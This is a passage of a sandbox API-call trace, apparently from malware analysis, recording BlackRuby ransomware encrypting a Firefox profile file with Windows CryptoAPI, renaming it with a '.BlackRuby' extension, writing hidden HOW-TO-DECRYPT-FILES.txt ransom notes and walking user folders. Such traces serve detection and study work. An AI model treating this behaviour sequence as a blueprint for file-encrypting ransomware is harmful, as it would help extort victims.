ftLastWriteTime.dwLowDateTime=0xc51450a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x108000)) returned 1 [0055.067] GetLastError () returned 0x0 [0055.067] SetErrorMode (uMode=0x0) returned 0x1 [0055.067] CryptAcquireContextW (in: phProv=0x18e9ec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18e9ec*=0x37c790) returned 1 [0055.067] GetLastError () returned 0x0 [0055.100] CryptImportKey (in: hProv=0x37c790, pbData=0x1b7d61c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18e9c8 | out: phKey=0x18e9c8*=0x360da0) returned 1 [0055.100] GetLastError () returned 0x0 [0055.100] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.100] GetLastError () returned 0x0 [0055.105] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.105] GetLastError () returned 0x0 [0055.105] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18e984 | out: phKey=0x18e984*=0x360de0) returned 1 [0055.105] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.105] GetLastError () returned 0x0 [0055.105] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1baa668*=0x1, dwFlags=0x0) returned 1 [0055.105] GetLastError () returned 0x0 [0055.105] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1baa634, dwFlags=0x0) returned 1 [0055.105] GetLastError () returned 0x0 [0055.109] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c008d0*, pdwDataLen=0x18ea14*=0x108100, dwBufLen=0x108100 | out: pbData=0x2c008d0*, pdwDataLen=0x18ea14*=0x108100) returned 1 [0055.117] GetLastError () returned 0x0 [0055.127] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1baa6c4*, pdwDataLen=0x18ea2c*=0x10, dwBufLen=0x10 | out: pbData=0x1baa6c4*, pdwDataLen=0x18ea2c*=0x10) returned 1 [0055.128] GetLastError () returned 0x0 [0055.128] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1baa6f4*, pdwDataLen=0x18ea34*=0x0, dwBufLen=0x10 | out: pbData=0x1baa6f4*, pdwDataLen=0x18ea34*=0x10) returned 1 [0055.128] GetLastError () returned 0x0 [0055.150] CryptDestroyKey (hKey=0x360da0) returned 1 [0055.150] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.150] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.150] GetLastError () returned 0x0 [0055.150] SetErrorMode (uMode=0x1) returned 0x0 [0055.150] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.151] GetLastError () returned 0xb7 [0055.151] GetFileType (hFile=0x184) returned 0x1 [0055.151] SetErrorMode (uMode=0x0) returned 0x1 [0055.151] GetFileType (hFile=0x184) returned 0x1 [0055.167] CloseHandle (hObject=0x184) returned 1 [0055.167] GetLastError () returned 0xb7 [0055.167] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.167] GetLastError () returned 0xb7 [0055.167] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\Encrypted_78vHJlgjpj6j1kcsD8RIGvPd8w1fVmROrPL5Jqi7mNE.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\Encrypted_78vHJlgjpj6j1kcsD8RIGvPd8w1fVmROrPL5Jqi7mNE.BlackRuby", lpFilePart=0x0) returned 0xac [0055.167] GetLastError () returned 0xb7 [0055.167] SetErrorMode (uMode=0x1) returned 0x0 [0055.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ea74 | out: lpFileInformation=0x18ea74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x29142f60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x108110)) returned 1 [0055.167] GetLastError () returned 0xb7 [0055.167] SetErrorMode (uMode=0x0) returned 0x1 [0055.167] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\Encrypted_78vHJlgjpj6j1kcsD8RIGvPd8w1fVmROrPL5Jqi7mNE.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\encrypted_78vhjlgjpj6j1kcsd8rigvpd8w1fvmrorpl5jqi7mne.blackruby")) returned 1 [0055.167] GetLastError () returned 0xb7 [0055.168] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x85 [0055.168] GetLastError () returned 0xb7 [0055.168] SetErrorMode (uMode=0x1) returned 0x0 [0055.168] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.168] GetLastError () returned 0x0 [0055.168] GetFileType (hFile=0x184) returned 0x1 [0055.168] SetErrorMode (uMode=0x0) returned 0x1 [0055.168] GetFileType (hFile=0x184) returned 0x1 [0055.169] CloseHandle (hObject=0x184) returned 1 [0055.169] GetLastError () returned 0x0 [0055.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x85 [0055.169] GetLastError () returned 0x0 [0055.169] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0055.170] GetLastError () returned 0x0 [0055.170] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", nBufferLength=0x105, lpBuffer=0x18e634, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpFilePart=0x0) returned 0x7f [0055.170] GetLastError () returned 0x0 [0055.170] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.170] GetLastError () returned 0x0 [0055.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.170] GetLastError () returned 0x0 [0055.170] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", nBufferLength=0x105, lpBuffer=0x18e50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpFilePart=0x0) returned 0x7f [0055.170] GetLastError () returned 0x0 [0055.170] SetErrorMode (uMode=0x1) returned 0x0 [0055.170] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.170] GetLastError () returned 0x0 [0055.170] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.170] GetLastError () returned 0x0 [0055.170] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.170] GetLastError () returned 0x12 [0055.171] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.171] SetErrorMode (uMode=0x0) returned 0x1 [0055.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", nBufferLength=0x105, lpBuffer=0x18e50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpFilePart=0x0) returned 0x7f [0055.171] GetLastError () returned 0x12 [0055.171] SetErrorMode (uMode=0x1) returned 0x0 [0055.171] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.171] GetLastError () returned 0x12 [0055.171] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.171] GetLastError () returned 0x12 [0055.171] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.171] GetLastError () returned 0x12 [0055.171] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.171] SetErrorMode (uMode=0x0) returned 0x1 [0055.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", lpFilePart=0x0) returned 0x54 [0055.171] GetLastError () returned 0x12 [0055.172] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.172] GetLastError () returned 0x12 [0055.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.172] GetLastError () returned 0x12 [0055.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", lpFilePart=0x0) returned 0x54 [0055.172] GetLastError () returned 0x12 [0055.172] SetErrorMode (uMode=0x1) returned 0x0 [0055.172] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.172] GetLastError () returned 0x12 [0055.172] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.172] GetLastError () returned 0x12 [0055.172] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.172] GetLastError () returned 0x12 [0055.172] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.172] SetErrorMode (uMode=0x0) returned 0x1 [0055.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps", lpFilePart=0x0) returned 0x54 [0055.172] GetLastError () returned 0x12 [0055.172] SetErrorMode (uMode=0x1) returned 0x0 [0055.173] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\minidumps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.173] GetLastError () returned 0x12 [0055.173] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.173] GetLastError () returned 0x12 [0055.173] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.173] GetLastError () returned 0x12 [0055.173] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.173] SetErrorMode (uMode=0x0) returned 0x1 [0055.173] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", lpFilePart=0x0) returned 0x52 [0055.173] GetLastError () returned 0x12 [0055.173] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.173] GetLastError () returned 0x12 [0055.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.173] GetLastError () returned 0x12 [0055.173] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", lpFilePart=0x0) returned 0x52 [0055.173] GetLastError () returned 0x12 [0055.173] SetErrorMode (uMode=0x1) returned 0x0 [0055.173] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.174] GetLastError () returned 0x12 [0055.174] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.174] GetLastError () returned 0x12 [0055.174] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.174] GetLastError () returned 0x12 [0055.174] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.174] GetLastError () returned 0x12 [0055.174] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.174] SetErrorMode (uMode=0x0) returned 0x1 [0055.174] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps", lpFilePart=0x0) returned 0x52 [0055.174] GetLastError () returned 0x12 [0055.174] SetErrorMode (uMode=0x1) returned 0x0 [0055.174] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.174] GetLastError () returned 0x12 [0055.174] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.175] GetLastError () returned 0x12 [0055.175] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.175] GetLastError () returned 0x12 [0055.175] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.175] GetLastError () returned 0x12 [0055.175] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.175] SetErrorMode (uMode=0x0) returned 0x1 [0055.175] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\webapps.json", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\webapps.json", lpFilePart=0x0) returned 0x5f [0055.175] GetLastError () returned 0x12 [0055.175] SetErrorMode (uMode=0x1) returned 0x0 [0055.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\webapps.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\webapps.json"), fInfoLevelId=0x0, lpFileInformation=0x1b44f98 | out: lpFileInformation=0x1b44f98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f40760, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x9f40760, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x9f40760, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x2)) returned 1 [0055.176] GetLastError () returned 0x12 [0055.176] SetErrorMode (uMode=0x0) returned 0x1 [0055.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6b [0055.177] GetLastError () returned 0x12 [0055.177] SetErrorMode (uMode=0x1) returned 0x0 [0055.177] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.177] GetLastError () returned 0x0 [0055.177] GetFileType (hFile=0x184) returned 0x1 [0055.177] SetErrorMode (uMode=0x0) returned 0x1 [0055.177] GetFileType (hFile=0x184) returned 0x1 [0055.177] WriteFile (in: hFile=0x184, lpBuffer=0x1b60a48*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1b60a48*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0055.178] GetLastError () returned 0x0 [0055.178] CloseHandle (hObject=0x184) returned 1 [0055.179] GetLastError () returned 0x0 [0055.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6b [0055.179] GetLastError () returned 0x0 [0055.179] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webapps\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0055.179] GetLastError () returned 0x0 [0055.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Application Data", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Application Data", lpFilePart=0x0) returned 0x21 [0055.179] GetLastError () returned 0x0 [0055.179] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.179] GetLastError () returned 0x0 [0055.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.179] GetLastError () returned 0x0 [0055.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Application Data", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Application Data", lpFilePart=0x0) returned 0x21 [0055.179] GetLastError () returned 0x0 [0055.179] SetErrorMode (uMode=0x1) returned 0x0 [0055.179] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Application Data\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0055.179] GetLastError () returned 0x5 [0055.181] SetErrorMode (uMode=0x0) returned 0x1 [0055.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts", lpFilePart=0x0) returned 0x19 [0055.181] GetLastError () returned 0x5 [0055.181] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.181] GetLastError () returned 0x5 [0055.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.181] GetLastError () returned 0x5 [0055.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts", lpFilePart=0x0) returned 0x19 [0055.181] GetLastError () returned 0x5 [0055.181] SetErrorMode (uMode=0x1) returned 0x0 [0055.181] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.181] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.182] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.182] GetLastError () returned 0x5 [0055.183] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.183] GetLastError () returned 0x5 [0055.183] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.183] GetLastError () returned 0x12 [0055.183] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.183] SetErrorMode (uMode=0x0) returned 0x1 [0055.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts", lpFilePart=0x0) returned 0x19 [0055.183] GetLastError () returned 0x12 